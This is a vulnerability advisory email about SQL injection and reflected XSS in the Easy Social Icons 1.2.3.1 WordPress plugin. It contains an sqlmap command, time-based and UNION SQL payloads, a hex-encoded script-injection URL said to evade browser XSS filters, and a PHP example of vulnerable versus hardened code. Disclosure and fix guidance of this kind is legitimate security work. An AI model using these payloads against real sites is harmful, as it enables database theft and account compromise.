Subject: SQL injection (+XSS) in Easy Social Icons 1.2.3.1
Date: Wed, 22 Jul 2015 14:49:37 +0200

Hello,

Plugin: Easy Social Icons 1.2.3.1 https://wordpress.org/plugins/easy-social-icons/

The vulnerable query is reachable only by an authenticated administrator, but the page has no CSRF protection, so an attacker who gets a logged-in administrator to open a crafted link can execute arbitrary SQL commands.

1. SQL injection (cnss_social_icon_add_fn)

Method: GET
Url: http://localhost/wp-admin/admin.php?page=cnss_social_icon_add&mode=edit&id=1
Vulnerable parameter: id

Example PHP callstack:
cnss_social_icon_add_fn   [/easy-social-icons/easy-social-icons.php:563]
wpdb::get_results

Verification (the --cookie value must carry an authenticated administrator session):

sqlmap --cookie "" --dbms mysql -p id -u "http://localhost/wp-admin/admin.php?page=cnss_social_icon_add&mode=edit&id=1"

...
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: page=cnss_social_icon_add&mode=edit&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))BirD)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: page=cnss_social_icon_add&mode=edit&id=1 UNION ALL SELECT CONCAT(0x71787a7671,0x70494a446c6e4368424c,0x7170716271),NULL,NULL,NULL,NULL,NULL,NULL-- 
...

Please note that this SQL injection can also be turned into reflected XSS. Because the markup is supplied as a MySQL hex literal (0x22...), decoded by the database and echoed back into the page, the request never contains the script tag literally, which bypasses browser anti-XSS filters such as Chrome's XSS Auditor.

Example (the hex literal decodes to "><script>alert(1);</script>):

http://localhost/wp-admin/admin.php?page=cnss_social_icon_add&mode=edit&id=-1+union+select+1%2C0x223e3c7363726970743e616c6572742831293b3c2f7363726970743e%2C3%2C4%2C5%2C6%2C7
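As an added illustration (not the plugin's code and not part of this advisory), the pattern described above, a GET id concatenated into a query passed to wpdb::get_results and the selected value echoed into the edit form unescaped, next to a hardened handler. The function names (demo_*), the table name cnss_social_icon, the column name title and the nonce action demo_icon_edit are assumptions; the WordPress API calls are real.

```php
<?php
// Added illustration, not the plugin's code: a hypothetical admin-page handler
// with the shape the advisory describes, beside a hardened version.
// Table name, column name, function names and nonce action are assumed.

// --- Vulnerable pattern (assumed shape of the bug, kept for contrast) ---
function demo_icon_edit_vulnerable() {
    global $wpdb;
    if ( isset( $_GET['mode'] ) && $_GET['mode'] === 'edit' ) {
        $id = $_GET['id']; // attacker-controlled, no nonce check, no type check
        // 'id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))BirD)' or a 7-column
        // UNION lands in the statement unchanged.
        $rows = $wpdb->get_results(
            "SELECT * FROM {$wpdb->prefix}cnss_social_icon WHERE id = $id"
        );
        if ( $rows ) {
            // Assume the echoed field is the second selected column. A UNION
            // placing 0x223e3c7363726970743e... there is decoded by MySQL to
            // "><script>alert(1);</script>, so the tag never appears literally
            // in the request and is written into the page raw.
            echo '<input type="text" name="title" value="' . $rows[0]->title . '">';
        }
    }
}

// --- Hardened version ---
function demo_icon_edit_hardened() {
    global $wpdb;

    // Only administrators may reach this, and only via a nonce-bearing link
    // (closes the CSRF path the advisory points out).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges' );
    }
    check_admin_referer( 'demo_icon_edit' ); // assumed action name; dies on mismatch

    if ( isset( $_GET['mode'] ) && $_GET['mode'] === 'edit' ) {
        $id = absint( $_GET['id'] ); // forces a non-negative integer
        if ( 0 === $id ) {
            wp_die( 'Invalid id' );
        }
        // $wpdb->prepare() binds %d as an integer, so the string form of the
        // injection cannot alter the statement.
        $row = $wpdb->get_row(
            $wpdb->prepare(
                "SELECT * FROM {$wpdb->prefix}cnss_social_icon WHERE id = %d",
                $id
            )
        );
        if ( $row ) {
            // esc_attr() encodes quotes and angle brackets, closing the
            // reflected-XSS path even if a stored value is hostile.
            echo '<input type="text" name="title" value="' . esc_attr( $row->title ) . '">';
        }
    }
}

// The edit link that points at the hardened handler must carry the nonce.
function demo_icon_edit_link( $id ) {
    return wp_nonce_url(
        admin_url( 'admin.php?page=cnss_social_icon_add&mode=edit&id=' . absint( $id ) ),
        'demo_icon_edit'
    );
}
```

The two changes are independent: the nonce stops a third party from driving an administrator's browser to the page at all, and the prepared statement plus output escaping removes both the injection and the XSS should the page be reached by other means.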

-- 
Regards,
Marcin Probola